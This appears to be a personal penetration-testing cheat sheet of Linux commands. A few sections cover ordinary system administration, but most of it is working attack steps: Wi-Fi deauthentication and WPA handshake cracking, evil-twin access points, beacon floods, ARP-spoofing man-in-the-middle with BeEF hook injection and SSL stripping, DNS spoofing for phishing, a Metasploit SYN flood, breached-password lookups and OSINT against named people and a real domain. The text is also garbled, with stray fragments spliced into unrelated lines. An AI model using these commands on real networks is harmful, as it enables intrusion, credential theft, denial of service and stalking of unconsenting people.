GUIDES

------------------[Binary to Path]--------------------------

mkdir -p ${HOME}/bin ~/.bashrc mkdir -p ~/bin cp {binary} to bin chmod 755 ${HOME}/bin/binary

nano ~~/.bashrc #[if folder doesnt exist that create it] export PATH="~~/bin:${PATH}" export PATH="${HOME}/bin:${PATH}" command -v binary

----------------------------------- [Sort Filesystem by size] ----------------------------------------

[where most size is stored] sudo du -hsx /* | sort -rh | head -n 40 sudo du -hsx /home/* | sort -rh | head -n 35

[enumerate storage on directory] sudo du -ah | sort -rh | head -n 30 du -m / | sort -rn | head -25

[remove unused packages] apt-get autoremove --purge

[check free disk space] sudo ncdu -x /

-------------------- [Clearing everything older than say 30 days]----------------------------

sudo journalctl --disk-usage sudo journalctl --vacuum-time=30d This example will keep 2GB worth of logs, clearing everything that exceeds this: sudo journalctl --vacuum-size=2G

----------------------------------- [Running Files] ----------------------------------------

systemctl list-units --all [Lists Running Modules] systemctl status --all [Lists Running Modules] lsmod [Activly Used # systemctl list-units --allDRiversr] dmesg [shows all device/driver activity] lsmod [shows active kernals etc]

----------------------------------------------------CONNECTING[HEADLESS]----------------------------------------- nmcli device wifi list

netdiscover -r 192.168.50.1/24 sparrow wifi

nmcli device wifi connect "MyWiFiNetwork" password "wifiPassword"
ip address show
apt install network-manager-openvpn
netstat - [helps display network activity; (like TCP and UDP) are being used. and rouing. --- outputs mainly TCP]
netcat -all --> [scans for other protocols (udp and tcp)]
netlookup <host_name> --> reveals ip
route --> gives access to routing tables
netstat -rn [finds gatweay address]

IFRENAME

ifrename # to rename wireless iwevent # display wireless events iwgetid # reports current essid iwlist # scan savailable aps or essid iwspy # monitors iw nodes and records strenght and quality of signal

NMCLI

nmcli general status sudo apt install ./discord.deb
nmcli general hostname # get and change sys hostname
nmcli general permissions # show the permssions available to caller
nmcli connection show --active sudo sniper -t https://dedicatedglass.com -m credentials
nmcli modify
nmap --trace out
nmcli networking on off # disable network control management
nmcli networking connectivity
nmcli radio all ## show status for all devices
nmcli radio wwan #-oG” flag can be used to store the nmap result in to specific file.# for tethered devices
nmcli radio wifi ## show status for wifi devices
nmcli device status
nmcli device showstatus
nmcli device showstatus wlan0
nmcli device wifi connect # connect to near hotspot
nmcli device wifi hotspot # create a wifi hotspot
wifi-show-password

-----------------------------------------------------BROADCAST-MODE---------------------------------------------

sudo ifconfig wlan0 down
sudo airmon-ng check
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo mdk3 wlan0 b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
airodump-ng wlan0 -c 11 ## use to monitor local APS max

--------------------------------------------------[WHOS CONNECTINIG TO ME]------------------------------------------

[Get devices and proximity to host] sudo iw dev wlx0013eff5483f scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort

[arp-scanner -- returns IP AND MAC]

sudo arp-scan --interface wlan0 -l

[angry ip scanner --- App, do not forget to configure settihngs ] [netdiscover]

sudo netdiscover -i wlan0 -r 192.168.1.1
sudo netdiscover -r 192.168.50.1/24

[KISMET] (browser based)

sudo kismet -c wlan1mon

[netscanner]

-------------------------------------[MITM- SNIFF SPECIFIC TARGET] -------------------------------------

[commansd]

net.show [shows whos connected to device]
net.probe on [probes packetsfor recon]
set arp.spoof.targets 19[2.168.1.10 [sets spoof to victim]
set arp.spoof.fullduplex true [sets attack to victim and host]
set arp.spoof.targets 192.168.43.157(IP address of the target Device)
arp.spoof on
set net.sniff.local true
net.sniff on [bettercap] - CLI [ettercap] - GUI
sudo bettercap -caplet http-ui [UI MODE]
bettercap -iface wlan0

[EtterCap - GUI]

sudo ettercap -G

[mitmproxy]

------------------------------------------ [Show / delete / spoof ARP cache] -----------------------------------------

ip neigh show
ip neigh flush all
arpspoof -t 10.5.23.42 10.5.23.1

-----------------------------------------[Enumerate local SMB (SAMBA) Network]---------------------------------------

sudo enum4linux localhost

---------------------------------------------[DISCOVER / DEAUTH USERS]---------------------------------------------

[MDK4 -- ULTIMATE NETWORK LIMITER]

sudo mdk4

[WASH: networks using the monitor mode interface-- such as printers]

sudo wash -i wlan2 -c 6

[REAVER: the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v)]

reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v

[Use the aireplay to deauth users]

aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon

[EVIL LIMITER -- DEAUTH AND LIMIIT BANDWIDHT] #

git clone https://github.com/bitbrute/evillimiter.git
cd evillimiter
sudo python3 setup.py install
sudo evillimiter
scan
limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS
block 3
hosts
free all

[AIRGEDDON] --> [DEAUTH USERS WHEN NOT ON ROUTER]

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh

[wifite]

sudo wifite -all

----------------------------------------- [BEACON FLOOD - DDOS] ---------------------------------

[mdk4]

sudo mdk4 wlan0 b "living room"

[airodump] - [shows devices (mac) within the station]

airodump-ng wlan0
airodump-ng -c11 -w airdump.txt -d 50:C7:BF:DC:4C:E8 wlan0

-----------------------------------------[AIRO-DUMP]---------------------------------------

[wifi scan]

sudo airodump-ng -w wider_scan_capture wlan0
sudo airodump-ng -w ap_scan_capture wlan0 -d {AP MAC ADDRESS ^}

##--> RUN Deauth First, and concrunetly run capture handshake [mdk4 -- deauth]

sudo mdk4 wlan0 d -E living room
sudo aireplay-ng --deauth 0 -a wlan0
sudo aireplay-ng -0 0 -a {AP MAC ADDRESS} -c wlan0

capture handshake [WAIT FOR MESSAGES TO UPDATE]

sudo airodump-ng -w deauth_capture -c {channel^} -d {AP MAC} wlan0

FINALY- CRACK THE PASSWORD

--> USE WIRESHARK TO EXAMIN .CAP. USE FILTER "eapol" TO FIND HANDSHAKES

aircrack-ng deauth_capture.cap -w wordlist.txt

------------------------------------------[DEAUTH / THROTTLE] -------------------------------------------- [MORE INFO]

[-0 means deauthentication.]
[-0 =continous attack, 10=Quick reconncet]
[-a Mac address of target AP]
[-c macaddress associated client on ap to deauth(IF OMMITTED, ALL GET DEAUTHE

[deauth-- mdk4] deauth using mdk4

--> RUN WIRESHARK

[Send deauth - ALL CLIENTS]

[aireplay-ng] -0 0 -a 50:C7:BF:DC:4C:E8 -c wlan0

[Send deauth] -- SPECIFIC CLIENTS

[aireplay-ng] -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0

**********--> a .acap file should be downloaded --> load it into wireshark for analasys ************

[FINALY--> CRACK THE PASSWORD] --> USE WIRESHARK TO EXAMIN .CAP. USE FILTER "eapol" TO FIND HANDSHAKES

[aircrack-ng] xyz.cap -w wordlist.txt

-----------------------------------------------------[WIRESHARK - PSK SPY ]------------------------------------------

First enter psk info into : https://www.wireshark.org/tools/wpa-psk.html (Gained from router pass and login)

-----------------------------------------------------[ PACKET-DUMP+ANALASYS ]------------------[tcpdump] -> captures traffic from all layeres of OSI MOdel. YOu can store and analyze the data, and analayze it later, on wireshark

-r = reverborse; places the captures in std_out --[TCP DUMP - persistant capture] -- $ sudo tcpdump -i eth0 -w capture_output.pcap -> Sniff traffic:

tcpdump [options] [filters]

Useful tcpdump options: ▪ -i interface: Interface or any for all ▪ -n: Disable name and port resolution ▪ -A: Print in ASCII ▪ -XX: Print in hex and ASCII ▪ -w file: Write output PCA

-r file: read PCAP --[Limited Capture]--

$ sudo tcpdump -i eth0 -C 100 -w limited_capture.pcap

[--NETCAT TCP LISTEN / CONNECT --] [Listen on TCP port]

ncat -vnlp 2305 [Connect to TCP port]
ncat -v 10.5.23.42 2305

--[Traffic from specific Victim] $ sudo tcpdump -i eth0 host 192.victims_ip -w host_traffic.pcap

--[airodump pcap] -- sudo airodump-ng wlan0mon -c 11 --bssid 61:32:victim_mac -w saved_pcap.pcap -o pcap -c = channel of station -----------------------------------------------------[LIMIT-BANDWIDTH]---------------------------------------- [netcut] -->A simple tool to ban people's Internet connection with ARP spoofing.

https://github.com/cdes5804/NetCut Optionally, set a limit on the size of the capture file.

-----------------------------------------------------[REAL-TIME-LAN-ACTIVITY]----------------------------------------

net.prob on
set arp.spoof.internal --> all computers will bespooofed
set arp.spoof.targets ip_add, ip_add
arp.spoof on
set net.sniff.output ./pencap.pcap
set net.sniff.verbose true
net.sniff on

-----------------------------------------------------[BEEF-BETTERCAP-PROXY]---------------------------------------- --> SETS UP A ARP PROXY ON A TARGET BETWEEN HOST AND GATEWAY. [Launch BEEF]

Beef-xss [Set Up Proxy]
set http.proxy.injectjs http://attack_ip:3000/hook.js
set https.proxy.injectjs https://attack_ip:3000/hook.js
set https.proxy.sslstrip true
set http.proxy.sslstrip true
http.proxy on
https.proxy on
set arp.spoof.targets 192.victim_ip, 192.gateway_ip
net.probe on
arp.spoof on
arp.spoof enable forwarding (std_out for results)

----------------------------------------------------[ARP-POISON+SSL_SRIP]--------------------------------------------- -->[ARP-Poison]

ettercap -Tq -M arp:remote -i eth0 -S /192.gateway_ip// //192.victim_ip

[IP-TABLE RULES] -->> any tcp traffic coming to 80 to 8080; so we can we use the proxy and ssl strip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 m
echo "1" > /proc/sys/net/ipv4/ip_forward

[RUN PROXY]

mitmdump -s sslstrip.py -m transparent

----------------------------------------------------[DUMPING PKSID (WPA2) ]---------------------------------------------

[TCP DUMP]690339 tcpdump -s 0 port ftp or ssh -i eth0 -w mycap.pcap

----------------------------------------------------[tracking domain]---------------------------------------------

ping [ping with both 'www' and naked domain
nslookup [[ping with both 'www' and naked domain]
use censys to find history between server, origin and destination.
[https://github.com/censys/censys-python]

---------------------------------------[DNS and reverse DNS lookup]-----------------------------------------

dig compass-security.com
dig -x 10.5.23.42

----------------------------------------------[COPY WEBPAGE ] -------------------------------------------------]

sudo apt install httrack webhttrack
httprack -w domain.com
tempmailer.de --> Use throw away email

----------------------------------------------[Windows Defender Payload] -----------------------------------]

[dsviper] enter info create python server to deliver payload

---------------------------max------------------------QUICK-WEBSERVER-----------------------------------------------

python3 -m http.serversudo apt install ./discord.deb function Main() { python -m http.server 9999 ngrok http 9999

}

---------------------------max------------------------[PCAP-TCP-DUMP]-----------------------------------------------

ssh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap [specifies not to use 'local host' or port 22'. time out is at 60 seconds

------------------------------------------------------[MITM-MAN-IN-THE-MIDDLE]-------------------------------------------

[arp-spoof] victim convisnced they are talking to server, but the spoof server is listening in the midle]

mitmweb [HAS NICE GUI]

[bettercap - GUI ]: sudo bettercap -caplet http-ui

net.probe on [shows whos on the network]
net.show [gives list of MAC and IP in graph]
set arp.spoof.targets [192.xxx]
arp.spoof on
net.sniff on [tells attacker what the victim is doing [inbound and out bound]
set dns.spoof.domains myebay.com [redirects to APACHE config]
set arp.spoof.targets 192.168.1.10 [sets spoof to victim]
set arp.spoof.fullduplex true [sets attack to victim and host]
set arp.spoof.targets 192.victim_ip(IP address of the target Device)
arp.spoof on
Vset net.sniff.local true
net.sniff on

--------------------------------------------------- [ARP & SPOOF- Capture + REDIRECT TRAFFIC MITM] -------------------------------------- [bettercap] --->> This will capure all websies visited by the target.

arp.spoof.targets 192.victim_ip
arp.spooof enable forwarding
net.sniff on ----------------[REDIRECT TRAFFIC] ---- (Phishing)
net.sniff off
dns.spoof myamazon.com -> 192.attacker_ip --------------------------------------------------- FIND IP FROM DOMAIN --------------------------------------

use ping, to see various hops. [will get firewalle] nslookup the hopped domain, will likely be a firewall like cloud flair. look for the last hop to cloud flair the difference between IP and domain wiill likely be the real IP your o looking for. tO cONFRIM, RUNN ;THE REAL ADDRESS through the results (DOMAINS) through NSLOOKUP, until an anomoly is found.

------------------------------------------------------[AP-SPOOFING]------------------------------------------------ [mdk4] +[airodump]

sudo mdk3 wlx0013eff5483f b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
airodump-ng wlx0013eff5483f -c 11 ## use to monitor local APS

-------------------------------------------------------QUICK& DIRTY NETWORK SCAN ---------------------------- function monitorWIFI() { sudo iwevent # display wireless events sudo iwlist # scan savailable aps or essid sudo iwspy # monitors iw nodes and records strenght and quality of signal sudo iwgetid # reports current essid } monitorWIFI

------------------------------------------------------ BASIC RECON ------------------------------------------------------

iwevent -- to get wireless events iwgetid - reports curretn essid / ap

hciconfig dev_name up sdptool browse MAC_ADDRESS

netstat - [helps d-oG” flag can be used to store the nmap result in to specific file.isplay network activity; (like TCP and UDP) are being used. and rouing. --- outputs mainly TCP] netcat -all --> [scans for other protocols (udp and tcp)]

netlookup <host_name> --> reveals ip route --> gives access to routing tables netstat -rn [finds gatweay address]

sudo netdiscover -i eth0 -r 192.168.64.1/24,/16,/8 [ [DISCOVER WHOS ON NETWORK]

dsniff - [practically snniffing for any password (FTP HTTP) WHILE ON NETWORK MDODE.] netcat [nc] --> [is a creepy, it can be used to follow you oce or persisant follwig you with a fwe commands. it can watch you upload/download or do anything on the networkthat hpersists)

TO FIND WEP PROTECTION

airodump-ng wlx0013eff5483f --encrypt wep

------------------------------------------------------ WIFI-PESTER ------------------------------------------------------

[-- CREATE FAKE AP --]

sudo airbase-ng --essid free_wifi -c 11 wlan1mon

[DEAUTH]

netdiscover -r 192.168.50.1/24
aireplay-ng --deauth 90000000 -a F0:2F:74:2C:7E:88 -c 9a:26:55:ed:ef:84 wlo1

[CRACKING WEP / WPA]

besside-ng en0 -c 6 -b
airodump-ng wlx0013eff5483f --encrypt wep

[make abunch of differnt APS]

sudo mdk3 wlx0013eff5483f b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
airodump-ng wlx0013eff5483f -c 11 ## use to monitor local APS

[TCP FLOOD]

sudo nmap -p1-64580 192.168.50.111
service postgresql start
msfconsole
search synflood
use auxiliary/dos/tcp/synflood
show options
set RHOST 192.168.50.111 [RHOST = VICTIM, LHOST = CLIENT]

[DEAUTH USERS WHEN NOT ON ROUTER] git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git cd airgeddon sudo bash airgeddon.sh

--------------------------------------------------------[EVIL-TWIN || FAKE-AP & BRIDGED CONNECTION] -----------------------------------

**** [EVIL TWIN ATTACK] USERS WILL SEE A FAKE AP THAT THEY CAN CONNECT TO AND ACCESS INTERNET [-- CREATE FAKE AP --]

sudo airbase-ng --essid free_wifi -c 11 wlan1mon

[--- CREATE BRIDGE ---- ]

sudo brctl addbr free_wifi_bridge

[--- CONNECT BRIDGE ---- ]

sudo brctl addif free_wifi_bridge at0
sudo brctl addif free_wifi_bridge eth0
sudo ifconfig at0 0.0.0.0 up

[-----CREATE BRIDGE IP -----]

sudo ifconfig free_wifi_bridge 192.168.1.2 up [configure so its within the subnet]
sudo ifconfig free_wifi_bridge up
sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

------------------------------------------------------ [BLUETOOTHNESS ------------------------------------------------------

https://null-byte.wonderhowto.com/how-to/bt-recon-snoop-bluetooth-devices-using-kali-linux-0165049/

---------------[BLUETOOTH MANAGER]--------------- [bluetoothctl] -h [bluetoothctl] scan on [btscanner] # launches GUI interface [bettercap]

ble.recon on ## returns the range and dsudo apt install ./discord.debevice name of enabled BT devices
ble.recon off
ble.show
ble.enum MAC_ADDRESS # PROVIDES MORE INFO ON BLUETOOTH DEV

hciconfig -h ## bluetooth context manager, similar to wifi manager (help menu)

man hciconfig
man hcitool
man sdptool ## allows queries on bluetooth servers --> permeessions / avail services
man btscanner
hciconfig dev_name up
sdptool browse MAC_ADDRESS
btscanner # launches GUI interface

------------------------------------------------------ FRONT-END ASSESSMENT / SCANNING 802.11 ------------------------------------------------------

[wig -- great preliminary scanner, returns good detials]

wig url.html

[sniper] sudo sniper -u sudo sniper -t https://dedicatedglass.com -m credentials

-------------------------------------------- DNS OSNT ---------------------------------------------

[To FUZZ URL's for username]

sherlock --nsfw -l username_target

[To quickly pull userfull server info]

dig --help
dig domain.com
dig domain.com -t mx
dig domain.com -t ns (dig domain.com AAAA # ipv6 addresses

lookoups#### 2 ⚙

proxychains firefox ike-scan dnstracer dedicatedglass.com Nslookup dedicatedglass.com (to get dns) Ping -a dedicatedglass.com tlssled 192.168.50.1 2 ⚙ sslscan -h dedicatedglass.com Recon-ng 2 ⚙ To grab SSL certificates sslyze --regular website or ip nslookup IP >> nslookup.txt http://geoiplookup.net/

host, nslookup, dig

host domain.com ## returns host IP and mailserver host -t ns domain.com host -t mx domain.com host ip_address # reverse dns

nslookup domain.com nslookup # to enter nslookup console

webserversudo iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort

set type=ns domain.com

mail server

set type=mx domain.com

------------------------------------------------------ FRAMEWORK - [OTHER] 802.11 ------------------------------------------------------

(AUTOPWN - SCAN ROUTER FOR VULN) rsf (AutoPwn) > use scanners/autopwn rsf (AutoPwn) > show options rsf (AutoPwn) > set target 192.168.64.1 rsf (AutoPwn) > run

(start armitage) sudo msfconsole sudo msfrpcd -P pass sudo msfrpcd -U msf -P pass --ssl sudo msfrpcd -U msf -P pass -a 127.0.0.1 --ssl sudo armitage

------------------------------------------------------ [WEB-APP VULNS] ------------------------------------------------------

Burp Suite
Nikto
Maltego
SQLMap ---> [Automates manual SQL Injectiionns]
Whatweb
whoislookupsudo iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort

FOR BROWSER PLUGINS (OSNIT, SELF SECURITY)

https://inteltechniques.com/

## throw-away email

tempmailer.de

#https://api.wigle.net/ #https://null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/

grabify.link ## --> track usersr

shodan.io ## --> device info

https://nvd.nist.gov/developers/vulnerabilities

https://www.exploit-db.com/

securityfocus.com

https://sur.ly/i/breachforums.com/

namecheckup.com ## --> osnit

https://neatnik.net/steganographr/ --> stenography (*to hide tracks)

NMAP SCRIPT LOCATION

ls -al /usr/share/nmap/scripts/

------------------------------------------------------ FRAMEWORK - NMAP SCANNING 802.11 ------------------------------------------------------

[nMap] = CLI [zenmap] = GUI

[scripts] ls -al /usr/share/nmap/scripts/

--------------------------------------------------- [ OSINT ] -----------------------------------------------

############### SOCIAL MEDIA ###################### ######## OSNIT ###########

Social media accounts#####

Pyhton3 sherlock.py username

DEEP OSNIT ### THE HARVESTER

cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all

online OSNIT https://api.wigle.net/ https://www.nirsoft.net/ (look thins up, powerful tool) http://geoiplookup.net/ ### GEO IP LCOATIONS tracemyip.org inteltechniques.com

Osintgram -- INSTAGRAM OSNIT

echo the ig dummy user account and set to .conf file (#3)

need to create username.conf, pw.conf and settings.json

git clone 'https://github.com/Datalux/Osintgram' pip3 install -r requirements.txt echo 'ig_dummyacct' > username.conf echo 'ig_dummyPass' > pw.conf echo '{},' > settings.json python3 main.py ig_TARGET list # displays available commands

DEEP OSNIT ### THE HARVESTER

cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all

TWINT --- TWITTER OSNIT

https://null-byte.wonderhowto.com/how-to/mine-twitter-for-targeted-information-with-twint-0193853/

[MAN] https://github.com/twintproject/twint

pip3 install --upgrade -e git+https://github.com/twintproject/twint.git@origin/master#egg=twint git clone https://github.com/twintproject/twint.git cd twint pip3 install -r requirements.txt pip3 install twint

sudo twint -h twint --help sudo twint -g="34.0343535, -117.23414142,2km" --search 'fish shack' --email --phone ## find discussinon about a business sudo twint -u realdonaldtrump -g='34.39343535, -118.234234252,2km' sudo twint -u realdonaldtrump --search 'loser' -o trump.txt

USER RECON --> ACTIVE SOCIAL MEDIA PAGES

git clone 'https://github.com/issamelferkh/userrecon' ./userrecon.sh

git clone 'https://github.com/sherlock-project/sherlock' cd sherlock python3 -m pip install -r requirements.txt python3 sherlock user123 python3 sherlock user1 user2 user3

TO LOOK UP BREACHED PASSWORDS AND USER INFO

git clone https://github.com/khast3x/h8mail.git apt-get install nodejs cd h8mail pip3 install -r requirements.txt python3 ./h8mail.py -h python3 h8mail.py -h python3 h8mail.py -t [email protected] -bc 'location_of_your_file/BreachCompilation' --local

TO RETURN DOMAIN EMAILS

theharvester -d priceline.com -l 1000 -b pgp nano targets.txt python3 h8mail.py -t '/root/h8mail/targets.txt' -bc '~/BreachCompilation' --local

------------------------------------------------------[BASICS]---------------------------------------------------

* By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc. This behavior can be changed by modifying or removing the Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports regardless of any Exclude directive.

-A = how aggressive you wannt the scan

--allports (Don't exclude any ports from version detection)

-p: Specifies which ports you want to scan. You can list individual ports separated by commas or use ranges separated by dashes.

-sS [SYN-Stealth Scan] = Initiates a SYN stealth scan, which is less likely to be logged.

-sV: [version detection] = Attempts to determine the version of the services running on open ports. -

-v: Increases verbosity, providing more information about the scan in progress.

-O = Operating System

sS Attempts to determine the version of the services running on open ports.

--traceourt = target hosting service or identify additional targets according to our needs for quickly tracing the path.

-v : Increases verbosity, providing more information about the scan in progress.

-–script = Enables the use of various scripts from Nmap’s script database for more detailed discovery.

–script: Enables the use of various scripts from Nmap’s script database for more detailed discovery. --version-intensity (Set version scan intensity)

---------------------- [NMAP - Write to Output] ---------------------------

-oN [saves to a text file]

scanOutput.txt <victim_ip>

-oX [saves to a XML file]

nmap -oX scanOutputXML.xml <victim_ip>

-oG [saves in Greppable format]

nmap -oG grep.txt <victim_ip>

-oA [Saves to all files]

nmap -oA <victim_ip>

--------------- [NMAP - Probing Intensty ] sV --version-light (Enable light mode) sV --version-all (Try every single probe) sV --version-trace (Trace version scan activity)

[NMAP- Rate of packetes being sent]

-max-rate -host-timeout -min-rate [sends the packets no slower than spcefied number]

[NMAP - TIMING] -T0 = paranoid -T1 = Sneaky -T2 = Okay -T3-5 = Fvk this

[+] ssh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap

1.]-------------------------- [NMAP BASIC SCANS]------------------------------

NNAP Functions / Modality] 1. Port Discovery and Specificiation 2. Host Discovery and specifciatino 3. Vuln Scanning 4. Application and Service Detection 5. Software Verson Detection 6. Firewall / IDS SPoofing

2.] ------------------ [NMAP BASIC -- TYPES OF SCANS ] -------------------------

-1 -proxy [Run in targets with proxies] * nmap -proxies proxy 1 URL, proxy 2 URL

-iL [scan from file] * nmap -iL scan.txt
[-sS = TCP Syn port scan] * nmap 192.168.target -sS
[-sT = TCP connect port scan] * nmap <victim_ip> -sT
[-sA = TCP ACK Port WITH PORT]
- nmap <victim_ip> -sA
[-sU = UDP Scan]
- nmap <victim_ip> -sU
[-Sf -- TCP FIN Scan]
- nmap -sF <victim_ip>
[-sX - XMAS Scan]
- nmap -sX <target_ip>
[-sP - Ping Scan]
- nmap -sP <victim_ip>
[-sU - UDP SCan]
- nmap -sU <victim_ip>
[-sA = TCP ACK scan(no port) ]
- nmap -Sa <victim_ip>

[3]------------------ [NMAP BASIC -- PORT SPECIFIC SCANS ] -------------------------

-P = Scan specefic ports (a. single or b. range)
- nmap -p 23 <victim_ip>
- nmap -p 23-100 <victim_ip>
[NMAP- different port scans / protocol: ie: Tcp 20-23 ; Udp 110
- nmap -pU:110, T:23-25,443, <victim_ip>

3.-p- = POrt scan for all ports

nmap -p- <victim_ip>

[4]------------------ [NMAP BASIC -- HOST DISCOVERY ] -------------------------

-sL [NMAP- List subnet without scanning] *nmap <victim_ip> -sL
-sn [NMAP - Disble port scanning]
- nmap <victim_ip> -sn
-Pn [Port Scan Only-- NO HOST DISCOVERY]
- nmap <victim_ip> -Pn
-PS [ TCP-SYN Discovery oon Specific port]
- nmap <victim_ip> -PS22-25, 80
-PA [ TCP-ACK Discovery on specific port ]
- nmap <victim_ip> -PA20-25,80
-PU [UDP Discovery on a secfic port
- nmap <victim_ip> -PU53
-PR [ARP discovery within network]
- nmap <victim_ip>/8 -PR
-n [no dns resolution
- nmap <victim_ip> -n

[5] -------------------- [NMAP VERSION DETECTION] --------------------

-sV [find the version of the port the service is running on [VERSION-INTENSITY = 1-9)

nmap <vctim_ip> -sV --version-intensity 9

-sV --version-all [Sets intensity to 9]

nmap <victim_ip> -sV --version-all

-sV --version-light [Sets intensity to light]

nmap <victim_ip> -sV --version-all

-O [Remote OS Detection]

nmap <victim_ip> -O

[6] ----------------------------[NMAP FIREWALL EVASION] -------------------------------------------

-f [scan frament packets]\

nmap -f <victim_ip>

-mtu [the largest packets scan will accept] * nmap -mtu [specify_mtu] <victim_ip>

-sI [scan idle zombie] - (This is accomplished by using packet spoofing to impersonate another computer so that the target believes it's being accessed by the zombie. The target will respond in different ways depending on whether the port is open, which can in turn be detected by querying the zombie) * nmap -sI [another_network_dev_ip] <victim_ip>

-data-length [size] - randomly append data *nmap -data-length [size] <victim_ip>

-nmap randomize-hosts [victim_ip]

--------------------------------------------------- [NMAP - PRACTICALITY] -----------------------------

[to find alll open ports]

nmap -v www.geeksforgeeks.org

[to scan all open prts]

nmap 192.168.1.1 -p-

[to scan based on services (HTTP, FTP)]

nmap 192.168.1.1 -p http,https

[to scan multiple hosts]

nmap 103.76.228.244 157.240.198.35 172.217.27.174

[To scan from FIle]

nmap -iL input.txt

[Tstore the nmap result in to specific file. -oG” flag ]

nmap -sS -oG

[UDP Port scan 'sU']

nmap -sU

[ICMP Port scan 'sN']

nmap -sn

[Perform a ping scan only]

nmap -sP [target]

[TCP SYN Ping-->Initial HandShake]

nmap -PS [target]

[TCP ACK PING---> Handshake back]

nmap -PA [target]

[UDP PING] --> Streaming etc (no hanndshsake)

nmap -PU [target]

[NMAP- Port Knocking] sudo nmap -sV -Pn -v ns8231.hostgator.com (#port knocking) Sudo nmap -A -Pn -v 76.172.85.231

nmap -sI -v google.com 192.168.50.1 2 ⚙ nmap -sW -v 192.168.50.1

[nmap to find who's on Lan] nmap -sn -v - A--version-intenstity=9 192.168.0.0/24

[nmap to return open ports and services -SV (specific device)-- PORT KNOCKING ] sudo nmap -sV -Pn -v ns8231.hostgator.com

Sudo nmap -A -Pn -v 76.172.85.231 nmap -sI -v google.com 192.168.50.1 2 ⚙ nmap -sW -v 192.168.50.1

nmap to find who's on Lan (subnet)

nmap -sn -v - A--version-intenstity=9 192.168.0.0/24

--------------------------------[NMAP- Identifiy FIREWALL]-----------------------------

[To scan to detect firewall settings.]

sudo nmap -sA 103.76.228.244

[To detect who is on the LAN]

nmap -sn -v - A--version-intenstity=9 192.168.0.0/24

[To Identify OS]

nmap -O

[Identifiy Domain Names] [-oG] stores in a filepath [sS] is stealthy

nmap -sS -oG

[Identify Hostnames]

sudo nmap -sL 103.76.228.244

[To identify Hostnames] sudo nmap -sL 103.76.228.244

[Traceroute Domains - See firewalls?]

nmap --trace out

-----------------------------[Example Scans]---------------------------------

[Disable port scanning. Host discovery only.]

nmap 192.168.1.1/24 -sn

[Never do DNS resolution]

nmap 192.168.1.1 -n

[ARP discovery on local network]

nmap 192.168.1.1-1/24 -PR

[Reverse DNS lookup of IP address range:]

nmap -sL 10.5.23.0/24

--------------------------------------------------------[Service and Version Detection]--------------------------------------------

---------[Attempts to determine the version of the service running on port]

nmap 192.168.1.1 -sV nmap 192.168.1.1 -sV -version-intensity 8 [high likelyhood of false positive or firewall raised] nmap 192.168.1.1 -sV -version-light [better outcome, longer time]

[Enables OS detection, version detection, script scanning, and traceroute] nmap 192.168.1.1 -A

------------------------------------[NMAP-OS-DETECTION]--------------------------------------------

Target Specication

Switch Example Description nmap 192.168.1.1 [Scan a single IP] nmap 192.168.1.1 192.168.2.1 [Scan specic IPs] nmap 192.168.1.1-254 [Scan a range] nmap scanme.nmap.org [Scan a domain] nmap 192.168.1.0/24 [Scan using CIDR notation] -iL nmap -iL targets.txt Scan targets from a llist] -iR nmap -iR 100 Scan 100 random hosts

---------------------- [NMAP Scan Techniques] ----------------

[TCP SYN port scan (Default)] -sS nmap 192.168.1.1 -sS [TCP connect port scan] -sT nmap 192.168.1.1 -sT

(Default without root privilege) [UDP port scan] -sU nmap 192.168.1.1 -sU [TCP ACK port scan] -sA nmap 192.168.1.1 -sA [TCP Window port scan] -sW nmap 192.168.1.1 -sW [TCP Maimon port scan] -sM nmap 192.168.1.1 -sM

---------------[NMAP hOST DISCOVERY]---------------- -sL nmap 192.168.1.1-3 -sL [No Scan. List targets only] -sn nmap 192.168.1.1/24 -sn [Disable port scanning. Host discovery only.] -Pn nmap 192.168.1.1-5 -Pn [Disable host discovery. Port scan ONLY] -PS nmap 192.168.1.1-5 -PS22- 25,80 TCP SYN discovery on port x. Port 80 by default -PA nmap 192.168.1.1-5 -PA22- 25,80 TCP ACK discovery on port x. Port 80 by default -PU nmap 192.168.1.1-5 -PU53 UDP discovery on port x. Port 40125 by default

[ARP discovery on local network] -PR nmap 192.168.1.1-1/24 -PR -n nmap 192.168.1.1 -n Never do DNS resolution

------------------------[NMAP OS Detection] -----------------------

[Remote OS detection using TCP/IP stack ngerprinting] -O nmap 192.168.1.1 -O [osscan-limit] -O --osscan-limit nmap 192.168.1.1 -O --

